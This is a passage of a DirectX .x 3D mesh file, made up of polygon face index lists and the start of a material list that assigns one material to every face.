4;942,825,840,943;, 4;951,822,825,942;, 4;950,826,822,951;, 4;949,828,826,950;, 4;948,830,828,949;, 4;947,832,830,948;, 4;946,834,832,947;, 4;945,836,834,946;, 4;944,838,836,945;, 4;943,840,838,944;, 4;825,865,862,840;, 4;822,880,865,825;, 4;826,878,880,822;, 4;828,876,878,826;, 4;830,874,876,828;, 4;832,872,874,830;, 4;834,870,872,832;, 4;836,868,870,834;, 4;838,866,868,836;, 4;840,862,866,838;, 4;922,862,865,923;, 4;923,865,880,924;, 4;924,880,878,925;, 4;925,878,876,926;, 4;926,876,874,927;, 4;927,874,872,928;, 4;928,872,870,929;, 4;929,870,868,930;, 4;930,868,866,931;, 4;931,866,862,922;, 4;923,932,933,922;, 4;924,941,932,923;, 4;925,940,941,924;, 4;926,939,940,925;, 4;927,938,939,926;, 4;928,937,938,927;, 4;929,936,937,928;, 4;930,935,936,929;, 4;931,934,935,930;, 4;922,933,934,931;, 4;932,864,863,933;, 4;941,881,864,932;, 4;940,879,881,941;, 4;939,877,879,940;, 4;938,875,877,939;, 4;937,873,875,938;, 4;936,871,873,937;, 4;935,869,871,936;, 4;934,867,869,935;, 4;933,863,867,934;, 4;890,722,731,888;, 4;888,731,730,886;, 4;886,730,729,882;, 4;882,729,728,885;, 4;885,728,727,900;, 4;900,727,726,898;, 4;898,726,725,896;, 4;896,725,724,894;, 4;894,724,723,892;, 4;892,723,722,890;, 4;723,871,869,722;, 4;722,869,867,731;, 4;731,867,863,730;, 4;730,863,864,729;, 4;729,864,881,728;, 4;728,881,879,727;, 4;727,879,877,726;, 4;726,877,875,725;, 4;725,875,873,724;, 4;724,873,871,723;, 4;1033,1026,1027,1034;, 4;1026,1019,1018,1027;, 4;1034,1027,1024,1035;, 4;1027,1018,1013,1024;, 3;350,339,342;, 3;339,350,338;, 3;345,341,333;, 6;405,398,403,406,411,410;, 6;408,401,400,409,413,412;, 4;357,355,354,356;, 4;352,357,356,353;, 3;353,356,354;, 3;352,355,357;, 4;374,373,372,375;, 4;385,371,373,374;, 4;380,362,361,381;, 4;379,360,362,380;, 12;447,448,449,438,439,440,441,442,443,444,445,446;, 16;306,307,308,293,294,295,296,297,298,299,300,301,302,303,304,305;, 4;5,2,3,6;, 4;6,3,0,7;, 4;68,67,66,64;, 4;70,71,66,67;, 4;73,71,70,69;, 4;78,74,73,69;, 4;78,77,76,74;, 4;77,17,15,76;, 4;21,15,17,22;, 4;21,22,23,20;, 4;23,16,14,20;, 4;61,14,16,60;, 4;63,61,60,59;, 4;68,64,63,59;, 4;18,19,84,86;, 4;8,18,86,90;, 4;91,90,86,87;, 10;739,740,741,732,733,734,735,736,737,738;, 4;4,1,2,5;, 4;1049,1047,1046,1048;, 4;1047,1057,1056,1046;, 6;1057,1047,1049,1051,1053,1055;, 4;1051,1049,1048,1050;, 6;1048,1046,1056,1054,1052,1050;, 4;1053,1051,1050,1052;, 4;1055,1053,1052,1054;, 4;1057,1055,1054,1056;, 4;1029,1030,1031,1028;, 4;1033,1034,1035,1032;, 4;1029,1022,1023,1030;, 4;1022,1017,1016,1023;, 4;1030,1023,1020,1031;, 4;1023,1016,1015,1020;, 6;39,53,48,45,42,38;, 4;38,36,41,39;, 5;56,41,36,34,32;, 4;36,37,35,34;, 3;37,36,38;, 4;42,43,37,38;, 4;43,83,35,37;, 4;43,44,82,83;, 4;46,85,82,44;, 4;87,85,46,47;, 4;49,55,87,47;, 4;49,50,54,55;, 3;49,48,50;, 4;48,49,47,45;, 3;46,45,47;, 4;45,46,44,42;, 3;43,42,44;, 4;53,51,50,48;, 5;91,87,55,31,30;, 3;88,84,89;, 3;84,88,83;, 6;35,83,88,25,24,33;, 4;34,35,33,32;, 4;32,33,58,56;, 4;33,24,27,58;, 4;26,27,24,25;, 5;9,26,25,88,89;, 4;89,84,19,9;, 4;51,81,54,50;, 4;81,79,55,54;, 4;79,28,31,55;, 4;30,31,28,29;, 5;29,8,90,91,30;, 3;86,85,87;, 4;85,86,84,82;, 3;83,82,84;, 6;52,53,39,40,3,2;, 5;40,56,57,0,3;, 3;40,41,56;, 3;40,39,41;, 3;52,51,53;, 6;80,81,51,52,2,1;, 3;80,79,81;, 4;80,1,28,79;, 4;1,11,29,28;, 3;29,11,8;, 4;10,9,8,11;, 3;9,10,26;, 4;10,0,27,26;, 4;58,27,0,57;, 3;57,56,58;, 4;18,8,9,19;, 4;911,914,915,910;, 4;910,915,916,909;, 4;909,916,917,908;, 4;908,917,918,907;, 4;907,918,919,906;, 4;906,919,920,905;, 4;905,920,921,904;, 4;904,921,912,903;, 4;903,912,913,902;, 4;902,913,914,911;, 4;910,890,888,911;, 4;909,892,890,910;, 4;908,894,892,909;, 4;907,896,894,908;, 4;906,898,896,907;, 4;905,900,898,906;, 4;904,885,900,905;, 4;903,882,885,904;, 4;902,886,882,903;, 4;911,888,886,902;, 4;914,889,891,915;, 4;915,891,893,916;, 4;916,893,895,917;, 4;917,895,897,918;, 4;918,897,899,919;, 4;919,899,901,920;, 4;920,901,884,921;, 4;921,884,883,912;, 4;912,883,887,913;, 4;913,887,889,914;, 4;1032,1025,1026,1033;, 4;1025,1012,1019,1026;, 4;775,891,889,777;, 4;773,893,891,775;, 4;771,895,893,773;, 4;769,897,895,771;, 4;767,899,897,769;, 4;763,901,899,767;, 4;764,884,901,763;, 4;781,883,884,764;, 4;779,887,883,781;, 4;777,889,887,779;, 4;794,775,777,795;, 4;793,773,775,794;, 4;792,771,773,793;, 4;801,769,771,792;, 4;800,767,769,801;, 4;799,763,767,800;, 4;798,764,763,799;, 4;797,781,764,798;, 4;796,779,781,797;, 4;795,777,779,796;, 4;791,794,795,790;, 4;782,793,794,791;, 4;783,792,793,782;, 4;784,801,792,783;, 4;785,800,801,784;, 4;786,799,800,785;, 4;787,798,799,786;, 4;788,797,798,787;, 4;789,796,797,788;, 4;790,795,796,789;, 4;790,776,774,791;, 4;791,774,772,782;, 4;782,772,770,783;, 4;783,770,768,784;, 4;784,768,766,785;, 4;785,766,762,786;, 4;786,762,765,787;, 4;787,765,780,788;, 4;788,780,778,789;, 4;789,778,776,790;, 4;755,774,776,757;, 4;753,772,774,755;, 4;751,770,772,753;, 4;749,768,770,751;, 4;747,766,768,749;, 4;743,762,766,747;, 4;744,765,762,743;, 4;761,780,765,744;, 4;759,778,780,761;, 4;757,776,778,759;, 4;815,755,757,816;, 4;814,753,755,815;, 4;813,751,753,814;, 4;812,749,751,813;, 4;821,747,749,812;, 4;820,743,747,821;, 4;819,744,743,820;, 4;818,761,744,819;, 4;817,759,761,818;, 4;816,757,759,817;, 4;810,815,816,809;, 4;811,814,815,810;, 4;802,813,814,811;, 4;803,812,813,802;, 4;804,821,812,803;, 4;805,820,821,804;, 4;806,819,820,805;, 4;807,818,819,806;, 4;808,817,818,807;, 4;809,816,817,808;, 4;809,756,754,810;, 4;810,754,752,811;, 4;811,752,750,802;, 4;802,750,748,803;, 4;803,748,746,804;, 4;804,746,742,805;, 4;805,742,745,806;, 4;806,745,760,807;, 4;807,760,758,808;, 4;808,758,756,809;, 4;733,754,756,734;, 4;732,752,754,733;, 4;741,750,752,732;, 4;740,748,750,741;, 4;739,746,748,740;, 4;738,742,746,739;, 4;737,745,742,738;, 4;736,760,745,737;, 4;735,758,760,736;, 4;734,756,758,735;, 4;1028,1021,1022,1029;, 4;1021,1014,1017,1022;, 5;402,313,316,106,401;, 5;105,317,313,402,403;, 4;105,403,398,93;, 4;321,105,93,132;, 3;105,321,317;, 4;328,317,321,329;, 4;327,313,317,328;, 4;326,316,313,327;, 3;316,326,320;, 5;158,106,316,320,160;, 4;188,119,106,158;, 4;106,119,400,401;, 5;118,128,399,400,119;, 5;398,399,128,92,93;, 4;132,93,92,134;, 4;134,133,131,132;, 6;135,137,351,310,131,133;, 4;331,310,351,332;, 4;330,309,310,331;, 4;132,131,310,309;, 3;321,132,309;, 4;329,321,309,330;, 4;158,157,187,188;, 4;160,159,157,158;, 6;162,163,185,187,157,159;, 4;188,187,185,186;, 4;186,118,119,188;, 4;184,117,118,186;, 4;117,127,128,118;, 4;92,128,127,94;, 4;134,92,94,136;, 4;136,135,133,134;, 4;138,137,135,136;, 4;95,138,136,94;, 4;94,127,126,95;, 4;116,126,127,117;, 4;117,184,182,116;, 4;184,183,181,182;, 4;186,185,183,184;, 4;182,181,179,180;, 4;180,115,116,182;, 4;115,125,126,116;, 4;95,126,125,96;, 4;138,95,96,140;, 4;140,139,137,138;, 4;137,139,153,155;, 4;351,137,155,312;, 3;312,332,351;, 4;332,312,311,322;, 3;156,311,312;, 3;156,312,155;, 4;156,155,153,154;, 4;154,103,104,156;, 3;318,156,104;, 3;318,311,156;, 4;322,311,318,323;, 4;323,318,314,324;, 4;104,124,314,318;, 4;103,122,124,104;, 4;124,122,108,107;, 4;107,315,314,124;, 3;315,324,314;, 3;315,325,324;, 3;325,315,319;, 4;108,122,123,109;, 4;102,123,122,103;, 4;152,102,103,154;, 4;154,153,151,152;, 4;152,151,149,150;, 4;150,101,102,152;, 4;101,369,372,102;, 4;123,102,372,373;, 4;371,109,123,373;, 4;110,109,371,370;, 4;168,109,110,170;, 4;166,108,109,168;, 3;153,139,151;, 4;139,225,149,151;, 4;215,225,139,140;, 4;214,215,140,96;, 4;96,125,218,214;, 4;218,125,115,220;, 4;115,180,222,220;, 4;180,179,224,222;, 4;224,223,221,222;, 7;211,212,223,224,169,200,199;, 4;170,197,200,169;, 4;110,195,197,170;, 4;370,368,195,110;, 4;368,366,196,195;, 4;197,195,196,198;, 4;198,199,200,197;, 4;211,199,198,209;, 4;209,198,196,207;, 4;210,209,207,208;, 4;210,208,231,230;, 4;172,230,231,111;, 4;248,172,111,249;, 4;267,248,249,268;, 4;286,267,268,287;, 4;305,286,287,306;, 4;304,285,286,305;, 4;285,266,267,286;, 4;266,247,248,267;, 4;247,171,172,248;, 4;171,229,230,172;, 4;210,230,229,212;, 4;212,211,209,210;, 4;212,229,175,177;, 4;238,175,229,243;, 4;238,243,228,174;, 4;245,174,228,246;, 4;264,245,246,265;, 4;283,264,265,284;, 4;302,283,284,303;, 4;301,282,283,302;, 4;282,263,264,283;, 4;263,260,245,264;, 4;260,173,174,245;, 4;173,237,238,174;, 4;176,175,238,237;, 4;178,177,175,176;, 4;176,112,114,178;, 4;120,114,112,121;, 4;97,120,121,98;, 4;98,144,142,97;, 4;98,240,239,144;, 4;146,239,240,99;, 4;256,146,99,257;, 4;275,256,257,276;, 4;278,275,276,279;, 4;297,278,279,298;, 4;298,279,280,299;, 4;299,280,281,300;, 4;280,261,262,281;, 4;279,276,261,280;, 4;276,257,258,261;, 4;261,258,259,262;, 4;258,130,113,259;, 4;257,99,130,258;, 4;99,240,242,130;, 4;130,242,236,113;, 4;242,121,112,236;, 4;121,242,240,98;, 4;144,143,141,142;, 4;144,239,241,143;, 4;145,241,239,146;, 4;255,145,146,256;, 4;274,255,256,275;, 4;277,274,275,278;, 4;296,277,278,297;, 4;295,292,277,296;, 4;292,273,274,277;, 4;273,254,255,274;, 4;254,227,145,255;, 4;145,227,244,241;, 3;241,244,143;, 3;244,141,143;, 4;141,244,234,205;, 3;141,205,226;, 4;142,141,226,216;, 4;97,142,216,213;, 4;213,217,120,97;, 4;114,120,217,219;, 4;219,221,178,114;, 4;221,223,177,178;, 3;223,212,177;, 4;222,221,219,220;, 4;217,218,220,219;, 4;213,214,218,217;, 4;216,215,214,213;, 4;226,225,215,216;, 7;189,149,225,226,205,206,190;, 4;149,189,192,150;, 4;150,192,194,101;, 4;101,194,367,369;, 4;193,365,367,194;, 4;191,193,194,192;, 4;192,189,190,191;, 4;204,191,190,206;, 4;202,193,191,204;, 4;363,365,193,202;, 4;358,363,202,201;, 4;201,235,360,358;, 4;235,232,362,360;, 4;129,232,235,100;, 4;111,231,232,129;, 4;232,231,361,362;, 4;359,361,231,208;, 4;208,207,364,359;, 4;207,196,366,364;, 4;204,203,201,202;, 4;203,233,235,201;, 4;100,235,233,147;, 4;251,100,147,252;, 4;270,251,252,271;, 4;289,270,271,290;, 4;308,289,290,293;, 4;293,290,291,294;, 4;290,271,272,291;, 4;271,252,253,272;, 4;252,147,148,253;, 4;147,233,234,148;, 4;205,234,233,203;, 4;206,205,203,204;, 4;176,237,236,112;, 4;113,236,237,173;, 4;259,113,173,260;, 4;262,259,260,263;, 4;281,262,263,282;, 4;300,281,282,301;, 4;303,284,285,304;, 4;284,265,266,285;, 4;265,246,247,266;, 4;246,228,171,247;, 4;171,228,243,229;, 4;249,111,129,250;, 4;268,249,250,269;, 4;287,268,269,288;, 4;288,269,270,289;, 4;269,250,251,270;, 4;250,129,100,251;, 4;253,148,227,254;, 4;148,234,244,227;, 4;272,253,254,273;, 4;291,272,273,292;, 4;294,291,292,295;, 4;307,288,289,308;, 4;306,287,288,307;, 4;375,372,369,376;, 5;376,369,367,396,397;, 5;396,367,365,377,395;, 5;377,365,363,390,391;, 5;390,363,358,378,389;, 4;378,358,360,379;, 3;390,389,391;, 3;396,395,397;, 4;388,389,378,382;, 4;379,381,382,378;, 3;381,379,380;, 4;384,370,371,385;, 5;393,368,370,384,392;, 5;383,366,368,393,394;, 5;387,364,366,383,386;, 5;382,359,364,387,388;, 4;381,361,359,382;, 3;387,386,388;, 3;393,392,394;, 4;505,503,426,428;, 4;503,499,424,426;, 4;499,500,422,424;, 4;501,500,499,498;, 4;498,499,503,502;, 4;502,503,505,504;, 4;504,505,507,506;, 4;507,505,428,430;, 4;509,507,430,432;, 4;506,507,509,508;, 4;508,509,511,510;, 4;511,509,432,434;, 4;513,511,434,436;, 4;510,511,513,512;, 4;512,513,515,514;, 4;514,515,517,516;, 4;416,517,515,414;, 4;515,513,436,414;, 4;516,517,519,518;, 4;519,517,416,418;, 4;521,519,418,420;, 4;518,519,521,520;, 4;520,521,500,501;, 4;500,521,420,422;, 4;442,432,430,443;, 4;441,434,432,442;, 4;440,436,434,441;, 4;439,414,436,440;, 4;438,416,414,439;, 4;449,418,416,438;, 4;448,420,418,449;, 4;447,422,420,448;, 4;446,424,422,447;, 4;445,426,424,446;, 4;444,428,426,445;, 4;443,430,428,444;, 4;692,506,508,693;, 4;693,508,510,694;, 4;694,510,512,695;, 4;695,512,514,696;, 4;696,514,516,697;, 4;697,516,518,698;, 4;698,518,520,699;, 4;699,520,501,700;, 4;700,501,498,701;, 4;701,498,502,690;, 4;690,502,504,691;, 4;691,504,506,692;, 4;689,692,693,688;, 4;688,693,694,687;, 4;687,694,695,686;, 4;686,695,696,685;, 4;685,696,697,684;, 4;684,697,698,683;, 4;683,698,699,682;, 4;682,699,700,681;, 4;681,700,701,680;, 4;680,701,690,679;, 4;679,690,691,678;, 4;678,691,692,689;, 4;688,461,459,689;, 4;687,463,461,688;, 4;686,465,463,687;, 4;685,467,465,686;, 4;684,469,467,685;, 4;683,471,469,684;, 4;682,473,471,683;, 4;681,452,473,682;, 4;680,451,452,681;, 4;679,455,451,680;, 4;678,457,455,679;, 4;689,459,457,678;, 4;458,459,461,460;, 4;460,461,463,462;, 4;462,463,465,464;, 4;464,465,467,466;, 4;466,467,469,468;, 4;468,469,471,470;, 4;470,471,473,472;, 4;472,473,452,453;, 4;453,452,451,450;, 4;450,451,455,454;, 4;454,455,457,456;, 4;456,457,459,458;, 4;668,458,460,669;, 4;669,460,462,670;, 4;670,462,464,671;, 4;671,464,466,672;, 4;672,466,468,673;, 4;673,468,470,674;, 4;674,470,472,675;, 4;675,472,453,676;, 4;676,453,450,677;, 4;677,450,454,666;, 4;666,454,456,667;, 4;667,456,458,668;, 4;665,668,669,664;, 4;664,669,670,663;, 4;663,670,671,662;, 4;662,671,672,661;, 4;661,672,673,660;, 4;660,673,674,659;, 4;659,674,675,658;, 4;658,675,676,657;, 4;657,676,677,656;, 4;656,677,666,655;, 4;655,666,667,654;, 4;654,667,668,665;, 4;664,485,483,665;, 4;663,487,485,664;, 4;662,489,487,663;, 4;661,491,489,662;, 4;660,493,491,661;, 4;659,495,493,660;, 4;658,497,495,659;, 4;657,476,497,658;, 4;656,475,476,657;, 4;655,479,475,656;, 4;654,481,479,655;, 4;665,483,481,654;, 4;482,483,485,484;, 4;484,485,487,486;, 4;486,487,489,488;, 4;488,489,491,490;, 4;490,491,493,492;, 4;492,493,495,494;, 4;494,495,497,496;, 4;496,497,476,477;, 4;477,476,475,474;, 4;474,475,479,478;, 4;478,479,481,480;, 4;480,481,483,482;, 4;644,482,484,645;, 4;645,484,486,646;, 4;646,486,488,647;, 4;647,488,490,648;, 4;648,490,492,649;, 4;649,492,494,650;, 4;650,494,496,651;, 4;651,496,477,652;, 4;652,477,474,653;, 4;653,474,478,642;, 4;642,478,480,643;, 4;643,480,482,644;, 4;641,644,645,640;, 4;640,645,646,639;, 4;639,646,647,638;, 4;638,647,648,637;, 4;637,648,649,636;, 4;636,649,650,635;, 4;635,650,651,634;, 4;634,651,652,633;, 4;633,652,653,632;, 4;632,653,642,631;, 4;631,642,643,630;, 4;630,643,644,641;, 4;640,533,531,641;, 4;639,535,533,640;, 4;638,537,535,639;, 4;637,539,537,638;, 4;636,541,539,637;, 4;635,543,541,636;, 4;634,545,543,635;, 4;633,524,545,634;, 4;632,523,524,633;, 4;631,527,523,632;, 4;630,529,527,631;, 4;641,531,529,630;, 4;530,531,533,532;, 4;532,533,535,534;, 4;534,535,537,536;, 4;536,537,539,538;, 4;538,539,541,540;, 4;540,541,543,542;, 4;542,543,545,544;, 4;544,545,524,525;, 4;525,524,523,522;, 4;522,523,527,526;, 4;526,527,529,528;, 4;528,529,531,530;, 4;620,530,532,621;, 4;621,532,534,622;, 4;622,534,536,623;, 4;623,536,538,624;, 4;624,538,540,625;, 4;625,540,542,626;, 4;626,542,544,627;, 4;627,544,525,628;, 4;628,525,522,629;, 4;629,522,526,618;, 4;618,526,528,619;, 4;619,528,530,620;, 4;617,620,621,616;, 4;616,621,622,615;, 4;615,622,623,614;, 4;614,623,624,613;, 4;613,624,625,612;, 4;612,625,626,611;, 4;611,626,627,610;, 4;610,627,628,609;, 4;609,628,629,608;, 4;608,629,618,607;, 4;607,618,619,606;, 4;606,619,620,617;, 4;616,551,550,617;, 4;615,552,551,616;, 4;614,553,552,615;, 4;613,554,553,614;, 4;612,555,554,613;, 4;611,556,555,612;, 4;610,557,556,611;, 4;609,547,557,610;, 4;608,546,547,609;, 4;607,548,546,608;, 4;606,549,548,607;, 4;617,550,549,606;, 4;570,550,551,568;, 4;568,551,552,566;, 4;566,552,553,564;, 4;564,553,554,562;, 4;562,554,555,558;, 4;558,555,556,561;, 4;561,556,557,580;, 4;580,557,547,578;, 4;578,547,546,576;, 4;576,546,548,574;, 4;574,548,549,572;, 4;572,549,550,570;, 4;586,570,568,587;, 4;587,568,566,588;, 4;588,566,564,589;, 4;589,564,562,590;, 4;590,562,558,591;, 4;591,558,561,592;, 4;592,561,580,593;, 4;593,580,578,582;, 4;582,578,576,583;, 4;583,576,574,584;, 4;584,574,572,585;, 4;585,572,570,586;, 4;587,602,603,586;, 4;588,601,602,587;, 4;589,600,601,588;, 4;590,599,600,589;, 4;591,598,599,590;, 4;592,597,598,591;, 4;593,596,597,592;, 4;582,595,596,593;, 4;583,594,595,582;, 4;584,605,594,583;, 4;585,604,605,584;, 4;586,603,604,585;, 4;602,569,571,603;, 4;601,567,569,602;, 4;600,565,567,601;, 4;599,563,565,600;, 4;598,559,563,599;, 4;597,560,559,598;, 4;596,581,560,597;, 4;595,579,581,596;, 4;594,577,579,595;, 4;605,575,577,594;, 4;604,573,575,605;, 4;603,571,573,604;, 4;427,575,573,429;, 4;425,577,575,427;, 4;423,579,577,425;, 4;421,581,579,423;, 4;419,560,581,421;, 4;417,559,560,419;, 4;415,563,559,417;, 4;437,565,563,415;, 4;435,567,565,437;, 4;433,569,567,435;, 4;431,571,569,433;, 4;429,573,571,431;, 4;433,417,419,431;, 3;435,417,433;, 4;437,415,417,435;, 4;431,419,421,429;, 5;429,421,423,425,427;, 4;4,13,11,1;, 4;10,11,13,12;, 4;0,10,12,7;, 6;72,5,6,65,66,71;, 6;65,6,7,62,63,64;, 3;65,64,66;, 3;72,71,73;, 6;75,4,5,72,73,74;, 3;75,74,76;, 5;76,15,13,4,75;, 4;12,13,15,14;, 5;7,12,14,61,62;, 3;62,61,63;, 4;20,14,15,21;, 3;375,385,374;, 4;376,384,385,375;, 4;397,392,384,376;, 4;397,395,394,392;, 4;377,383,394,395;, 4;391,386,383,377;, 4;391,389,388,386;, 6;67,68,23,22,69,70;, 5;16,23,68,59,60;, 5;78,69,22,17,77;, 3;407,408,406;, 4;408,412,411,406;, 4;410,411,412,413;, 4;405,410,413,409;, 3;404,405,409;, 3;409,400,399;, 3;409,399,404;, 3;404,399,405;, 3;405,399,398;, 5;339,326,327,328,340;, 4;340,328,329,341;, 4;341,329,330,333;, 4;333,330,331,334;, 3;334,331,352;, 4;352,331,332,335;, 4;335,332,322,336;, 4;336,322,323,337;, 5;337,323,324,325,338;, 4;338,325,326,339;, 3;334,352,353;, 4;349,337,338,350;, 3;348,337,349;, 3;337,348,336;, 4;347,355,352,335;, 4;347,335,336,348;, 3;346,333,334;, 3;345,333,346;, 4;346,334,353,354;, 6;183,185,163,165,179,181;, 3;167,179,165;, 4;224,179,167,169;, 4;169,167,168,170;, 4;168,167,165,166;, 4;166,165,163,164;, 3;406,402,407;, 3;402,406,403;, 4;343,349,350,342;, 3;344,349,343;, 5;354,349,344,345,346;, 5;348,349,354,355,347;, 4;342,339,340,343;, 4;343,340,341,344;, 3;341,345,344;, 3;407,402,408;, 3;408,402,401;, 4;325,319,320,326;, 6;160,320,319,161,162,159;, 5;107,164,161,319,315;, 4;164,163,162,161;, 4;164,107,108,166;; MeshMaterialList { 1; 1033; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 